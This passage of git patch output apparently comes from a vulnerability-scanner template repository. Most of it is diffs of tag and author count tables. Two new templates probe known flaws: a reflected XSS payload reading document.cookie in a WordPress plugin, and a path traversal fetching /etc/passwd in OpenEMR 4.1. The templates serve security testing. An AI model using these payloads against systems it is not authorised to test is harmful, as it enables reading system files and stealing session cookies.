k8s | 1 | bernardofsr | 1 | | | | | | | +| shopxo | 1 | johnk3r | 1 | | | | | | | +| alibaba | 1 | rodnt | 1 | | | | | | | +| axis | 1 | akshansh | 1 | | | | | | | +| jsf | 1 | jteles | 1 | | | | | | | +| servicenow | 1 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| expn | 1 | ratnadip gajbhiye | 1 | | | | | | | +| sco | 1 | its0x08 | 1 | | | | | | | +| h3c-imc | 1 | mohammedsaneem | 1 | | | | | | | +| powercreator | 1 | shifacyclewla | 1 | | | | | | | +| haproxy | 1 | aresx | 1 | | | | | | | +| gateone | 1 | ooooooo_q | 1 | | | | | | | +| plugin | 1 | zandros0 | 1 | | | | | | | +| duomicms | 1 | ajaysenr | 1 | | | | | | | +| addpac | 1 | berkdusunur | 1 | | | | | | | +| blind | 1 | qlkwej | 1 | | | | | | | +| netsweeper | 1 | petruknisme | 1 | | | | | | | +| javamelody | 1 | tim_koopmans | 1 | | | | | | | +| wiki | 1 | manuelbua | 1 | | | | | | | +| faraday | 1 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| ec2 | 1 | zhenwarx | 1 | | | | | | | +| mongoshake | 1 | b4uh0lz | 1 | | | | | | | +| xiuno | 1 | | | | | | | | | | xunchi | 1 | | | | | | | | | -| blind | 1 | | | | | | | | | -| dompdf | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| node | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| rmc | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| liferay | 1 | | | | | | | | | -| vsftpd | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | -| ilo4 | 1 | | | | | | | | | -| zte | 1 | | | | | | | | | -| openx | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| jitsi | 1 | | | | | | | | | -| achecker | 1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| csrf | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| grav | 1 | | | | | | | | | -| ruckus | 1 | | | | | | | | | -| memcached | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| bedita | 1 | | | | | | | | | -| chinaunicom | 1 | | | | | | | | | -| alibaba | 1 | | | | | | | | | -| dlogin | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| jenzabar | 1 | | | | | | | | | -| xvr | 1 | | | | | | | | | -| netsweeper | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| uwsgi | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| netis | 1 | | | | | | | | | -| shopxo | 1 | | | | | | | | | -| ssltls | 1 | | | | | | | | | -| pgadmin | 1 | | | | | | | | | -| rmi | 1 | | | | | | | | | -| landray | 1 | | | | | | | | | -| sangfor | 1 | | | | | | | | | -| mariadb | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| dotnet | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | -| centreon | 1 | | | | | | | | | -| payara | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | -| weiphp | 1 | | | | | | | | | -| nsasg | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | -| vnc | 1 | | | | | | | | | -| circontrorl | 1 | | | | | | | | | -| gespage | 1 | | | | | | | | | -| gogs | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | | clockwatch | 1 | | | | | | | | | -| biometrics | 1 | | | | | | | | | -| mara | 1 | | | | | | | | | -| sqlite | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| expose | 1 | | | | | | | | | -| azure | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| netrc | 1 | | | | | | | | | -| cloudinary | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| finereport | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| blue-ocean | 1 | | | | | | | | | -| tenda | 1 | | | | | | | | | -| kong | 1 | | | | | | | | | -| nette | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | -| darkstat | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| npm | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| zookeeper | 1 | | | | | | | | | -| panabit | 1 | | | | | | | | | -| heroku | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| fuelcms | 1 | | | | | | | | | -| cerebro | 1 | | | | | | | | | -| spip | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| lutron | 1 | | | | | | | | | -| wamp | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | -| javamelody | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| harbor | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| pacsone | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| exchange | 1 | | | | | | | | | -| dotnetnuke | 1 | | | | | | | | | -| bruteforce | 1 | | | | | | | | | -| gateone | 1 | | | | | | | | | -| erp-nc | 1 | | | | | | | | | -| plugin | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| clink-office | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | -| mdb | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| wavlink | 1 | | | | | | | | | -| xmlchart | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | | -| getsimple | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | -| yachtcontrol | 1 | | | | | | | | | -| sarg | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | | 74cms | 1 | | | | | | | | | -| zmanda | 1 | | | | | | | | | -| postgres | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| mcafee | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| rfi | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | | jnoj | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| solman | 1 | | | | | | | | | -| ec2 | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| status | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | | manageengine | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| mautic | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | | wavemaker | 1 | | | | | | | | | -| monitorr | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| horde | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | | acme | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| akamai | 1 | | | | | | | | | +| grav | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| azure | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| xff | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| netis | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| flash | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| favicon | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| hasura | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| dlogin | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| zimbra | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| db | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | | keenetic | 1 | | | | | | | | | | linkedin | 1 | | | | | | | | | -| spring | 1 | | | | | | | | | -| camunda | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| froxlor | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| 2014 | 1 | | | | | | | | | | opm | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| backdoor | 1 | | | | | | | | | -| mcafee | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| adminer | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | -| webmin | 1 | | | | | | | | | -| spf | 1 | | | | | | | | | -| clusterengine | 1 | | | | | | | | | -| smartsense | 1 | | | | | | | | | -| checkpoint | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| zenario | 1 | | | | | | | | | -| lancom | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| emby | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| expressjs | 1 | | | | | | | | | -| redwood | 1 | | | | | | | | | -| chevereto | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | -| tpshop | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| dvr | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| powercreator | 1 | | | | | | | | | -| razor | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| mongoshake | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| default-login | 1 | | | | | | | | | -| redhat | 1 | | | | | | | | | -| wuzhicms | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | -| sitecore | 1 | | | | | | | | | -| plastic | 1 | | | | | | | | | -| wp-theme | 1 | | | | | | | | | -| mpsec | 1 | | | | | | | | | -| flink | 1 | | | | | | | | | -| scimono | 1 | | | | | | | | | -| mantis | 1 | | | | | | | | | -| tika | 1 | | | | | | | | | -| comodo | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| haproxy | 1 | | | | | | | | | -| subrion | 1 | | | | | | | | | -| wifisky | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| anchorcms | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| h3c-imc | 1 | | | | | | | | | -| accela | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| shopware | 1 | | | | | | | | | -| selea | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | +| druid | 1 | | | | | | | | | | calendarix | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | -| sidekiq | 1 | | | | | | | | | -| bigbluebutton | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| phpfusion | 1 | | | | | | | | | -| hasura | 1 | | | | | | | | | -| hadoop | 1 | | | | | | | | | -| proftpd | 1 | | | | | | | | | -| yii | 1 | | | | | | | | | -| addpac | 1 | | | | | | | | | -| monitorix | 1 | | | | | | | | | -| zimbra | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| payara | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| adminer | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| kong | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | | lanproxy | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| sage | 1 | | | | | | | | | -| codeigniter | 1 | | | | | | | | | -| beanshell | 1 | | | | | | | | | -| email | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| visualtools | 1 | | | | | | | | | -| domxss | 1 | | | | | | | | | -| symfony | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | -| aruba | 1 | | | | | | | | | -| robomongo | 1 | | | | | | | | | -| sourcebans | 1 | | | | | | | | | -| wso2 | 1 | | | | | | | | | -| flash | 1 | | | | | | | | | -| upload | 1 | | | | | | | | | -| ueditor | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| cacti | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | | lansweeper | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | -| k8s | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| tongda | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | +| itop | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| enum | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| harbor | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| exacqvision | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | | sprintful | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| liferay | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| bruteforce | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| wso2 | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| exchange | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| firebase | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| wp-theme | 1 | | | | | | | | | +| cve2005 | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| sitecore | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| backdoor | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| glpi | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| akkadian | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| symfony | 1 | | | | | | | | | +| node | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| enumeration | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| yii | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| status | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index e3518cbcea..0f79e9d451 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 527 | dhiyaneshdk | 227 | cves | 534 | info | 558 | http | 1613 | -| panel | 210 | pikpikcu | 219 | vulnerabilities | 249 | high | 434 | file | 43 | -| xss | 192 | pdteam | 188 | exposed-panels | 212 | medium | 361 | network | 35 | -| wordpress | 182 | dwisiswant0 | 126 | exposures | 170 | critical | 204 | dns | 10 | -| exposure | 178 | geeknik | 120 | technologies | 150 | low | 149 | | | -| rce | 175 | daffainfo | 104 | misconfiguration | 118 | | | | | -| cve2020 | 151 | madrobot | 60 | takeovers | 70 | | | | | -| lfi | 150 | princechaddha | 53 | default-logins | 49 | | | | | -| wp-plugin | 121 | gy741 | 48 | file | 43 | | | | | -| tech | 92 | gaurang | 42 | workflows | 34 | | | | | +| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 | +| panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 | +| xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 | +| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 | +| exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | | +| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | | +| cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | | +| lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | | +| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | | +| config | 90 | gaurang | 42 | workflows | 34 | | | | | From 3afcf2a7557070ea805fc71400af20b3b9a45e78 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 31 Jul 2021 06:01:46 +0700 Subject: [PATCH 1315/4083] Create CVE-2014-4536.yaml --- cves/2014/CVE-2014-4536.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2014/CVE-2014-4536.yaml diff --git a/cves/2014/CVE-2014-4536.yaml b/cves/2014/CVE-2014-4536.yaml new file mode 100644 index 0000000000..f095dbf4ae --- /dev/null +++ b/cves/2014/CVE-2014-4536.yaml @@ -0,0 +1,31 @@ +id: CVE-2014-4536 + +info: + name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f + - https://nvd.nist.gov/vuln/detail/CVE-2014-4536 + tags: cve,cve2014,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&" + + matchers-condition: and + matchers: + - type: word + words: + - '">' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From afe800c0dbc1fa724d06912994762b8ad509cde0 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 31 Jul 2021 06:04:14 +0700 Subject: [PATCH 1316/4083] Create CVE-2012-0991.yaml --- cves/2012/CVE-2012-0991.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2012/CVE-2012-0991.yaml diff --git a/cves/2012/CVE-2012-0991.yaml b/cves/2012/CVE-2012-0991.yaml new file mode 100644 index 0000000000..ff5286914a --- /dev/null +++ b/cves/2012/CVE-2012-0991.yaml @@ -0,0 +1,27 @@ +id: CVE-2012-0991 + +info: + name: OpenEMR 4.1 - Local File Inclusion + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter. + reference: | + - https://www.exploit-db.com/exploits/36650 + - https://www.cvedetails.com/cve/CVE-2012-0991 + tags: cve,cve2012,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 9a47b53434ebdcd9561f2c81dadc4872ba8e6c13 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 31 Jul 2021 08:41:41 +0530 Subject: [PATCH 1317/4083] Update CVE-2012-0991.yaml --- cves/2012/CVE-2012-0991.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2012/CVE-2012-0991.yaml b/cves/2012/CVE-2012-0991.yaml index ff5286914a..80b0e2d0a3 100644 --- a/cves/2012/CVE-2012-0991.yaml +++ b/cves/2012/CVE-2012-0991.yaml @@ -8,7 +8,7 @@ info: reference: | - https://www.exploit-db.com/exploits/36650 - https://www.cvedetails.com/cve/CVE-2012-0991 - tags: cve,cve2012,lfi + tags: 